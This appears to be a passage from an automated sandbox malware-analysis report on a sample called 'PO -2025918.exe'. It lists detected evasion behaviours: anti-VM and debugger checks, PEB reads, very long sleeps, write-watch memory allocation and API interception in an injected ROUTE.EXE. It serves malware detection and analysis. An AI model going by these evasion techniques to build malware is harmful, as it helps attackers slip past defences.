Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: PO -2025918.exe PID: 6680, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 2540000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 2750000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 4750000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 8E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 9E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: A040000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: B040000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E rdtsc 4_2_01BD096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\PO -2025918.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4035 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\PO -2025918.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\ROUTE.EXE API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\PO -2025918.exe TID: 6756 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476 Thread sleep time: -78000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\ROUTE.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\ROUTE.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose, 9_2_00AAC600
Source: C:\Users\user\Desktop\PO -2025918.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: PO -2025918.exe, 00000000.00000002.1894470547.0000000007342000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nWrCyfejRZk.exe, 0000000A.00000002.3540722904.0000000001570000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2423878838.00000260B784C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PO -2025918.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E rdtsc 4_2_01BD096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00417A63 LdrLoadDll, 4_2_00417A63
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C561C3 mov eax, dword ptr fs:[00000030h] 4_2_01C561C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C561C3 mov eax, dword ptr fs:[00000030h] 4_2_01C561C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov ecx, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C661E5 mov eax, dword ptr fs:[00000030h] 4_2_01C661E5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h] 4_2_01B8A197
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h] 4_2_01B8A197
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h] 4_2_01B8A197
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD0185 mov eax, dword ptr fs:[00000030h] 4_2_01BD0185
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C34180 mov eax, dword ptr fs:[00000030h] 4_2_01C34180
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C34180 mov eax, dword ptr fs:[00000030h] 4_2_01C34180
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC01F8 mov eax, dword ptr fs:[00000030h] 4_2_01BC01F8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4C188 mov eax, dword ptr fs:[00000030h] 4_2_01C4C188
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4C188 mov eax, dword ptr fs:[00000030h] 4_2_01C4C188
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h] 4_2_01C1019F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h] 4_2_01C1019F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h] 4_2_01C1019F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h] 4_2_01C1019F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov ecx, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0124 mov eax, dword ptr fs:[00000030h] 4_2_01BC0124
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C28158 mov eax, dword ptr fs:[00000030h] 4_2_01C28158
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64164 mov eax, dword ptr fs:[00000030h] 4_2_01C64164
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64164 mov eax, dword ptr fs:[00000030h] 4_2_01C64164
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C50115 mov eax, dword ptr fs:[00000030h] 4_2_01C50115
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 mov ecx, dword ptr fs:[00000030h] 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h] 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h] 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h] 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B96154 mov eax, dword ptr fs:[00000030h] 4_2_01B96154
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B96154 mov eax, dword ptr fs:[00000030h] 4_2_01B96154
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C156 mov eax, dword ptr fs:[00000030h] 4_2_01B8C156
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B880A0 mov eax, dword ptr fs:[00000030h] 4_2_01B880A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C120DE mov eax, dword ptr fs:[00000030h] 4_2_01C120DE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C160E0 mov eax, dword ptr fs:[00000030h] 4_2_01C160E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9208A mov eax, dword ptr fs:[00000030h] 4_2_01B9208A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C0F0 mov eax, dword ptr fs:[00000030h] 4_2_01B8C0F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD20F0 mov ecx, dword ptr fs:[00000030h] 4_2_01BD20F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B980E9 mov eax, dword ptr fs:[00000030h] 4_2_01B980E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_01B8A0E3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C280A8 mov eax, dword ptr fs:[00000030h] 4_2_01C280A8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C560B8 mov eax, dword ptr fs:[00000030h] 4_2_01C560B8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C560B8 mov ecx, dword ptr fs:[00000030h] 4_2_01C560B8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C16050 mov eax, dword ptr fs:[00000030h] 4_2_01C16050
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A020 mov eax, dword ptr fs:[00000030h] 4_2_01B8A020
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C020 mov eax, dword ptr fs:[00000030h] 4_2_01B8C020
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h] 4_2_01BAE016
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h] 4_2_01BAE016
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h] 4_2_01BAE016
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h] 4_2_01BAE016
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C14000 mov ecx, dword ptr fs:[00000030h] 4_2_01C14000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h] 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBC073 mov eax, dword ptr fs:[00000030h] 4_2_01BBC073
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B92050 mov eax, dword ptr fs:[00000030h] 4_2_01B92050
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26030 mov eax, dword ptr fs:[00000030h] 4_2_01C26030
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C163C0 mov eax, dword ptr fs:[00000030h] 4_2_01C163C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4C3CD mov eax, dword ptr fs:[00000030h] 4_2_01C4C3CD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C343D4 mov eax, dword ptr fs:[00000030h] 4_2_01C343D4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C343D4 mov eax, dword ptr fs:[00000030h] 4_2_01C343D4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h] 4_2_01C3E3DB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h] 4_2_01C3E3DB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E3DB mov ecx, dword ptr fs:[00000030h] 4_2_01C3E3DB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h] 4_2_01C3E3DB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h] 4_2_01B88397
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h] 4_2_01B88397
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h] 4_2_01B88397
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h] 4_2_01B8E388
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h] 4_2_01B8E388
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h] 4_2_01B8E388
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB438F mov eax, dword ptr fs:[00000030h] 4_2_01BB438F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB438F mov eax, dword ptr fs:[00000030h] 4_2_01BB438F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC63FF mov eax, dword ptr fs:[00000030h] 4_2_01BC63FF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h] 4_2_01BAE3F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h] 4_2_01BAE3F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h] 4_2_01BAE3F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h] 4_2_01BA03E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A3C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h] 4_2_01B983C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h] 4_2_01B983C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h] 4_2_01B983C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h] 4_2_01B983C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h] 4_2_01C12349
